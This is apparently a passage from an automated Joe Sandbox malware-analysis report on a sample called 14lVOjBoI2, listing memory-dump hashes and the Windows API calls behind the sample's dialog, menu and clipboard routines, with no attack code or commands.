                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5b6220a89fbf67146b231567ac829ec74762a6648b57b82fae8a403082114990
                                                                                                          • Instruction ID: ca85ea5c05f7e646fdc5ed8d22b754e00f14b9649dce7a0de7383d60bb278940
                                                                                                          • Opcode Fuzzy Hash: 5b6220a89fbf67146b231567ac829ec74762a6648b57b82fae8a403082114990
                                                                                                          • Instruction Fuzzy Hash: 87C19274E00218CFDB54DFA9D994B9DBBB2BF89341F2080A9D409AB365DB359E81CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cb102d60becc66409ff3ca6df0615e6d267dcadd211528c6539cef6903735fbe
                                                                                                          • Instruction ID: b0b07668150df7c56cd987f5da5c9cb0a38a601dbd84e91a44b4a61e35b1dff8
                                                                                                          • Opcode Fuzzy Hash: cb102d60becc66409ff3ca6df0615e6d267dcadd211528c6539cef6903735fbe
                                                                                                          • Instruction Fuzzy Hash: 38C19274E00218CFDB14DFA9D994B9DBBB2BF89341F5081A9D409AB355DB359E81CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 790a4345ce774536d3c94182c2f746c3201b1a7122be3116c6b4108e3424076a
                                                                                                          • Instruction ID: 03d55dec4982e40080cebefe60f02e1fc9f893be8d4f42eb1a0570f31cd7c6aa
                                                                                                          • Opcode Fuzzy Hash: 790a4345ce774536d3c94182c2f746c3201b1a7122be3116c6b4108e3424076a
                                                                                                          • Instruction Fuzzy Hash: 63C19174E00218CFDB14DFA9D995B9DBBB2BF89301F6081A9E409AB355DB359E81CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3e509054e78df2711ef24e16d1e8d3e77ad1adcf158b6e144b4797886f088db4
                                                                                                          • Instruction ID: 858877aa781785438552d52c690523cc81c2103891a6eb7cd9779e9a2ab71251
                                                                                                          • Opcode Fuzzy Hash: 3e509054e78df2711ef24e16d1e8d3e77ad1adcf158b6e144b4797886f088db4
                                                                                                          • Instruction Fuzzy Hash: F7C19174E00218CFDB18DFA9D994B9DBBB2BF89341F2081A9D409AB355DB359E85CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: da1bad9e8db0fa4561557a54c657a7ff0854071951d8a5cb028d5db30ba5b521
                                                                                                          • Instruction ID: d5358bffeb1853e777339a3871aea554ced94b394f3ebb314754ab6df99b8532
                                                                                                          • Opcode Fuzzy Hash: da1bad9e8db0fa4561557a54c657a7ff0854071951d8a5cb028d5db30ba5b521
                                                                                                          • Instruction Fuzzy Hash: B3C1A274E00218CFDB14DFA9D994B9DBBB2BF89341F6081A9E409AB355DB359E81CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 903cfecab4f1337acaad2de88e7c8aab9f814ecf3ae8cafca93f6bb3d9f7732d
                                                                                                          • Instruction ID: f2f06fe5571824b10a198370cc2204c11c8384f102d79cd029fd1c20197ffe18
                                                                                                          • Opcode Fuzzy Hash: 903cfecab4f1337acaad2de88e7c8aab9f814ecf3ae8cafca93f6bb3d9f7732d
                                                                                                          • Instruction Fuzzy Hash: 8FC19174E00218CFDB14DFA9D994B9DBBB2BF89301F6081A9E409AB355DB359E81CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cf0cb3e0a967ce548adc02677448484cb218006919f0c9db512c70ce084ca604
                                                                                                          • Instruction ID: e5eca6b96b08fbaef5f33ad058f81a3dfd7882690e4c2a1955d1bae4958a1195
                                                                                                          • Opcode Fuzzy Hash: cf0cb3e0a967ce548adc02677448484cb218006919f0c9db512c70ce084ca604
                                                                                                          • Instruction Fuzzy Hash: B1C1A274E00218CFDB18DFA9D994B9DBBB2BF89301F1080A9D409AB355DB359E81CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b1cdb5d0430aee10f95e9c168b998ce9725e8bc777f4d689c06afa50b6c9da69
                                                                                                          • Instruction ID: 16d9a9122ae4dfa423e8ff60c171e1a3dd567800c5c9caf20a6cd18437ad8753
                                                                                                          • Opcode Fuzzy Hash: b1cdb5d0430aee10f95e9c168b998ce9725e8bc777f4d689c06afa50b6c9da69
                                                                                                          • Instruction Fuzzy Hash: 06C19274E00218CFDB14DFA9D994B9DBBB2BF89341F6080A9D409AB355DB359E81CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 36baa3fe2cc17c2886babbef628a9478c456e0eaf8822ad93d6da1a04e8dc25e
                                                                                                          • Instruction ID: 62939d7e58efd9fab8848bc324c36dacd10b447cadeb274368c399fc73b9f385
                                                                                                          • Opcode Fuzzy Hash: 36baa3fe2cc17c2886babbef628a9478c456e0eaf8822ad93d6da1a04e8dc25e
                                                                                                          • Instruction Fuzzy Hash: D7C19174E00218CFDB14DFA9D994B9DBBB2BF89301F6081A9E409AB355DB359E81CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b22f92ec34b039c87a52bff31f6816f55adae1ce567913e8a7bb0ae2b531f992
                                                                                                          • Instruction ID: 32d09cbb67ab0268654617d75eb2f1c508ea35d50070e40e6a1f002431233242
                                                                                                          • Opcode Fuzzy Hash: b22f92ec34b039c87a52bff31f6816f55adae1ce567913e8a7bb0ae2b531f992
                                                                                                          • Instruction Fuzzy Hash: D9C19174E00218CFDB14DFA9D994B9DBBB2BF89301F2080A9E409AB355DB359E81CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cbc04ca134931d9dd557dc64e13925ec735d8090de6de10eb1b495e802835569
                                                                                                          • Instruction ID: ceff6b002e07867cde959b85aafa518ec46a987d4bd58f6b4e0ba19c032da0ba
                                                                                                          • Opcode Fuzzy Hash: cbc04ca134931d9dd557dc64e13925ec735d8090de6de10eb1b495e802835569
                                                                                                          • Instruction Fuzzy Hash: 5FC19174E00218CFDB14DFA9C994B9DBBB2BF89301F2080A9E409AB355DB359E81CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 410d64528c021c93e33bcf6ad36b0b84315d4ed9e68d6d1743d4054de7a95cb9
                                                                                                          • Instruction ID: a449c8be1c8d219788459bd1c02a864fc682349d309d002b73b08505b1da64b9
                                                                                                          • Opcode Fuzzy Hash: 410d64528c021c93e33bcf6ad36b0b84315d4ed9e68d6d1743d4054de7a95cb9
                                                                                                          • Instruction Fuzzy Hash: 01C1A274E00218CFEB14DFA9C994B9DBBB2BF89301F2081A9D409AB355DB359E85CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ffc95fe0e2af7c78b2afe7c95d1e5ee1467c27fab0216289a1be3b9bdc728414
                                                                                                          • Instruction ID: 3345a128d23430048fd2efde5dd122c77e74e686ca681c059ab6ef7264e7a707
                                                                                                          • Opcode Fuzzy Hash: ffc95fe0e2af7c78b2afe7c95d1e5ee1467c27fab0216289a1be3b9bdc728414
                                                                                                          • Instruction Fuzzy Hash: 12C1A174E00218CFDB54DFA9D994B9DBBB2BF89301F6081A9D409AB365DB359E81CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a3ae9480fa7209fc55c94c3dfb28eff72f23395ca0e8ecd5aa53c6dd6152d7d4
                                                                                                          • Instruction ID: 7f333e0bf1de18858c9a5f04a9c848c74c31f2ccac6c769fa0e56ee944d6ca41
                                                                                                          • Opcode Fuzzy Hash: a3ae9480fa7209fc55c94c3dfb28eff72f23395ca0e8ecd5aa53c6dd6152d7d4
                                                                                                          • Instruction Fuzzy Hash: 25C1A174E00218CFDB18DFA9D994B9DBBB2BF89301F2080A9D409AB355DB359E85CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 72aabd67c39110b64e9c0eddbdca4080db3694895c2a4efdc86da73f5bcde341
                                                                                                          • Instruction ID: 2f37e4f1bbdec4aea079d9f9463badf69407f3733f0a4c9f1a40988123b47fa4
                                                                                                          • Opcode Fuzzy Hash: 72aabd67c39110b64e9c0eddbdca4080db3694895c2a4efdc86da73f5bcde341
                                                                                                          • Instruction Fuzzy Hash: EBC1A174E00218CFDB18DFA9D994B9DBBB2BF89301F6081A9D409AB355DB359E81CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3f43b4a1d4baf7b8320594c0ae01e0dce8f867cce25de485c88b54a0d9205c05
                                                                                                          • Instruction ID: cecab6350320cc3328f36218b110df24d94ae627b366ac5e883fa9ed7d70b987
                                                                                                          • Opcode Fuzzy Hash: 3f43b4a1d4baf7b8320594c0ae01e0dce8f867cce25de485c88b54a0d9205c05
                                                                                                          • Instruction Fuzzy Hash: 80C19074E00218CFDB18DFA9C994B9DBBB2BF89301F6081A9D409AB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d6a19413cdf5906b749388d2c8c20ede35cdbf79756031ccd5a66b28eaa973a3
                                                                                                          • Instruction ID: cc53abdddd970e4889cbbbb387df69f4cf55733d00fb779caad28fb8c1be29c7
                                                                                                          • Opcode Fuzzy Hash: d6a19413cdf5906b749388d2c8c20ede35cdbf79756031ccd5a66b28eaa973a3
                                                                                                          • Instruction Fuzzy Hash: FBC1A274E00218CFDB18DFA9D994B9DBBB2BF89301F2081A9D409AB355DB359E85CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c9a1b0d3b24a7f9a204e322e341d9137d13e9ba9809abb088543aaace09c07e2
                                                                                                          • Instruction ID: a29015d498c6a100baaca295917cc863afb2b597f7c233b1428a07c1f6bffc6a
                                                                                                          • Opcode Fuzzy Hash: c9a1b0d3b24a7f9a204e322e341d9137d13e9ba9809abb088543aaace09c07e2
                                                                                                          • Instruction Fuzzy Hash: 1CC19174E00218CFDB14DFA9D994B9DBBB2BF89341F2081A9D409AB355DB359E81CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: facf2db0d8d66bde31e047e1a3cbed2109807335c2592490a8ff6a51dc23f53b
                                                                                                          • Instruction ID: d5c05304c4d857e0e3ceefba04a8ccf2fcd5ee78e16b97795715f97c28b4170d
                                                                                                          • Opcode Fuzzy Hash: facf2db0d8d66bde31e047e1a3cbed2109807335c2592490a8ff6a51dc23f53b
                                                                                                          • Instruction Fuzzy Hash: F9C1A174E00218CFDB18DFA9D994B9DBBB2BF89341F2081A9D409AB355DB359E81CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a9e8b9059ee264fa195bc8cdb29d9cdf8aede6f57de0d167baf16a547182dba2
                                                                                                          • Instruction ID: 08f5d84f85e76f4124c3b17de789869f327513383eee3bb32c9beb71fe26d5f6
                                                                                                          • Opcode Fuzzy Hash: a9e8b9059ee264fa195bc8cdb29d9cdf8aede6f57de0d167baf16a547182dba2
                                                                                                          • Instruction Fuzzy Hash: FAC19074E00218CFDB18DFA9D994B9DBBB2BF89341F6081A9D409AB355DB359E81CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672360659.0000000038D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 38D70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38d70000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 61c576668be4fb16c9973ec8fc2255e1f8935d97e82e1306ab435c0a7dc962f7
                                                                                                          • Instruction ID: 3d0f96d2fb1f101132bb845591790d2a601a512de541eebd3c8f5ebe5e9d0fe4
                                                                                                          • Opcode Fuzzy Hash: 61c576668be4fb16c9973ec8fc2255e1f8935d97e82e1306ab435c0a7dc962f7
                                                                                                          • Instruction Fuzzy Hash: F4C19074E00218CFDB14DFA9D994B9DBBB2BF89301F6081A9E409AB355DB359E81CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672360659.0000000038D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 38D70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38d70000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ffe44439a1f8e5932665b16d4d0957589d7df276de92db7196be3c889a336394
                                                                                                          • Instruction ID: d961ad8217e2559a73606824dd91f815b0029d7bd45d68858320556eebfe309d
                                                                                                          • Opcode Fuzzy Hash: ffe44439a1f8e5932665b16d4d0957589d7df276de92db7196be3c889a336394
                                                                                                          • Instruction Fuzzy Hash: 48C19274E00218CFDB14DFA9D994B9DBBB2BF89301F6081A9E409AB355DB359E85CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672360659.0000000038D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 38D70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38d70000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1e9357e77bf43d591bfee6240f1141ec67b67d8c4acbe444832594341e3207f9
                                                                                                          • Instruction ID: d9d77e86b5b6242bbdf3207546bd12fd3133e99dfefc8f142f0b4c96d8b948f7
                                                                                                          • Opcode Fuzzy Hash: 1e9357e77bf43d591bfee6240f1141ec67b67d8c4acbe444832594341e3207f9
                                                                                                          • Instruction Fuzzy Hash: D3B19178E00258CFDB54DFA8D995B9DBBB2BF49341F6080A9E409AB351DB359E81CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672360659.0000000038D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 38D70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38d70000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 41949b1f74cab30f27ae0cc1a2041bda36a4fd0ac07bd85bd128b2d621742f8d
                                                                                                          • Instruction ID: 3ad3d5fc4ae43b3aff6fb6180c6e948bcaadb0ab911b624b075445ba84209edc
                                                                                                          • Opcode Fuzzy Hash: 41949b1f74cab30f27ae0cc1a2041bda36a4fd0ac07bd85bd128b2d621742f8d
                                                                                                          • Instruction Fuzzy Hash: 4AB19D78E00258CFDB54DFA8D995B9DBBB2BF49341F6080A9E409AB351DB359E81CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672809134.00000000392C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_392c0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 26f99d93531255fd497f7d12ad25b85ddd26855da4947e421d38d175920ba39b
                                                                                                          • Instruction ID: dbecd1df83593f0f85881fc6d553cbb9dff4f67fe3a441666ff5a9eb7c78d998
                                                                                                          • Opcode Fuzzy Hash: 26f99d93531255fd497f7d12ad25b85ddd26855da4947e421d38d175920ba39b
                                                                                                          • Instruction Fuzzy Hash: 85E0996090E7C1AFEB138B34882A4847F70AE0720131E49CFC0D0DF0F3DA18488AC32A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672809134.00000000392C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_392c0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2265b79856ecd146a463b82706bed24ff8a2d7b643b3f9c26dc2fa03fe6aa7eb
                                                                                                          • Instruction ID: 75e4a38f71a417a95dbff848321257522665b9b3dd3befca15627026c4fe27ef
                                                                                                          • Opcode Fuzzy Hash: 2265b79856ecd146a463b82706bed24ff8a2d7b643b3f9c26dc2fa03fe6aa7eb
                                                                                                          • Instruction Fuzzy Hash: 1AE05E5180E7C02FEF070B3509225823FB49C1751031E4ACBC4E09F0B3E214459AC762
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672809134.00000000392C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_392c0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6ddab1d947187aadb2db4e9a293669a45c1ca6ee97641a813ff711dd430fe964
                                                                                                          • Instruction ID: 1eb610ce904e308d6640cf5cfe18827ed8a6ed164e19883403b71a69a10ac150
                                                                                                          • Opcode Fuzzy Hash: 6ddab1d947187aadb2db4e9a293669a45c1ca6ee97641a813ff711dd430fe964
                                                                                                          • Instruction Fuzzy Hash: 76C012B080F3C0AFCB134B2548220443F30AE0B11130A8ACAC0808B0B3D22800CA83AA
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                          • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                            • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                          • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                          • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                          • CreatePopupMenu.USER32 ref: 00405580
                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                          • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                          • EmptyClipboard.USER32 ref: 0040561B
                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                          • CloseClipboard.USER32 ref: 00405676
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643392985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.2643377365.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643408809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643427234.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.2643593639.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                          • String ID: {
                                                                                                          • API String ID: 590372296-366298937
                                                                                                          • Opcode ID: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                          • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                          • Opcode Fuzzy Hash: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                          • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                          APIs
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                          • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                          • DestroyWindow.USER32 ref: 00403CAE
                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403DBE
